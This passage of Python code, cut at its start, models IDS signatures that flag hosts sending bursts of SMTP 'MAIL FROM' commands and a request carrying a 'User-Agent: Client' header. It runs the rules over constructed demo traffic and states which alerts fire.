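    def __init__(self, count: int, seconds: float) -> None:
        self.count, self.seconds = count, seconds
        self._state: Dict[str, Tuple[float, int]] = {}   # src -> (window start, count)

    def hit(self, src: str, ts: float) -> bool:
        start, n = self._state.get(src, (ts, 0))
        if ts - start >= self.seconds:      # window expired: open a fresh one
            start, n = ts, 0
        n += 1
        fire = n >= self.count
        if fire:                            # type threshold: fire, then count again
            n = 0
        self._state[src] = (start, n)
        return fire


def mail_from_present(payload: bytes) -> bool:
    # content:"mail from\:"; nocase;  -- the SMTP envelope command itself, so a
    # bare SYN (the old flags:S12 form of these rules) no longer fires.
    return b"mail from:" in payload.lower()


def header_2000328(f: Flow) -> bool:
    # alert tcp !$SMTP_SERVERS any -> !$HOME_NET 25
    src, dst = ipaddress.ip_address(f.src), ipaddress.ip_address(f.dst)
    return src not in SMTP_SERVERS and dst not in HOME_NET and f.dport == 25


def header_2002087(f: Flow) -> bool:
    # alert tcp !$HOME_NET any -> $HOME_NET 25
    src, dst = ipaddress.ip_address(f.src), ipaddress.ip_address(f.dst)
    return src not in HOME_NET and dst in HOME_NET and f.dport == 25


def run_mail_rules(flows: List[Flow]) -> List[Tuple[int, str, float]]:
    """Return (sid, src, ts) for every alert the two mail rules would raise."""
    rules = {
        2000328: (header_2000328, Threshold(count=10, seconds=120)),
        2002087: (header_2002087, Threshold(count=10, seconds=60)),
    }
    alerts = []
    for f in sorted(flows, key=lambda x: x.ts):
        for sid, (header, thr) in rules.items():
            if header(f) and mail_from_present(f.payload) and thr.hit(f.src, f.ts):
                alerts.append((sid, f.src, f.ts))
    return alerts


def matches_2002082(request: bytes) -> bool:
    """Rev 7 of 2002082: 'User-Agent: Client' CRLF present and no '.microsoft.com'
    CRLF anywhere in the request (the negated content that removed the FPs).
    flow:to_server,established is assumed to hold for the request passed in."""
    low = request.lower()
    return b"user-agent: client\r\n" in low and b".microsoft.com\r\n" not in low


def demo() -> List[Tuple[int, str, float]]:
    """Constructed traffic: a workstation spewing mail, the site relay doing its
    normal job, one ordinary sender, and an outside host hammering the relay."""
    flows = []
    for i in range(25):   # 10.0.5.7: 25 envelopes to 25 outside MXs in 100 s
        flows.append(Flow(i * 4.0, "10.0.5.7", f"203.0.113.{i + 1}", 25,
                          b"MAIL FROM:<bot%d@example.net>\r\n" % i))
    for i in range(30):   # 10.0.0.25 is in $SMTP_SERVERS: excluded by the header
        flows.append(Flow(i * 3.0, "10.0.0.25", "198.51.100.10", 25,
                          b"mail from:<user@example.org>\r\n"))
    flows.append(Flow(50.0, "10.0.9.2", "198.51.100.20", 25,   # one message: under count
                      b"Mail From:<me@example.org>\r\n"))
    for i in range(12):   # 192.0.2.66 sends 12 envelopes to our relay in 30 s: sid 2002087
        flows.append(Flow(200.0 + i * 2.5, "192.0.2.66", "10.0.0.25", 25,
                          b"MAIL FROM:<spam@example.com>\r\n"))
    return run_mail_rules(flows)
```

demo() yields two 2000328 alerts for 10.0.5.7 (on its 10th and 20th envelope) and one 2002087 alert for 192.0.2.66, while the relay and the single-message sender stay silent.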